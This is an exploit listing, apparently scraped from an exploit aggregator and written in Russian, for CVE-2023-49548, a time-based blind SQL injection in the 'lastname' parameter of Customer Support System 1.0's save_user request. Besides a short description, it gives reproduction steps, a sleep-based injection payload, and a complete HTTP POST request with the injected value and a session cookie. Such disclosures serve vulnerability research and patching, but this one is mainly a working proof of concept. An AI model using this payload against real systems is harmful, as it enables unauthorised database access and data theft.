## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-GERALDOALCANTARA-CVE-2023-49548
# CVE-2023-49548
# Customer Support System 1.0 - Уязвимость SQL-инъекции в параметре «lastname» при операции «save_user»
**Описание** : В версии 1 Customer Support System существует уязвимость SQL-инъекции. Злоумышленник может выполнять SQL-команды к базе данных MySQL при создании/редактировании пользователя через уязвимый параметр «lastname».
**Уязвимая версия продукта** : Customer Support System 1.0
**Автор CVE** : Geraldo Alcântara
**Дата** : 28/11/2023
**Подтверждено** : 19/12/2023
**CVE** : CVE-2023-49548
**Протестировано на** : Windows
### Шаги для воспроизведения:
1. Войдите в приложение.
2. Нажмите на изображение своего пользователя и выберите «Manage Account».
3. Вставьте вредоносную нагрузку в параметр «lastname».
**нагрузка** : '%20and%20(select*from(select(sleep(20)))a)--%20
### Запрос:
root@kitploit:~
POST /customer_support/ajax.php?action=save_user HTTP/1.1
Host: 192.168.68.182
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 144
Origin: http://192.168.68.182
Connection: close
Referer: http://192.168.68.182/customer_support/index.php?page=department_list
Cookie: PHPSESSID=arlocktakq815fq1lpm5fjml9n
id=1&table=users&firstname=Administrator&middlename=teste&lastname='%20and%20(select*from(select(sleep(5)))a)--%20&username=admin&password=admin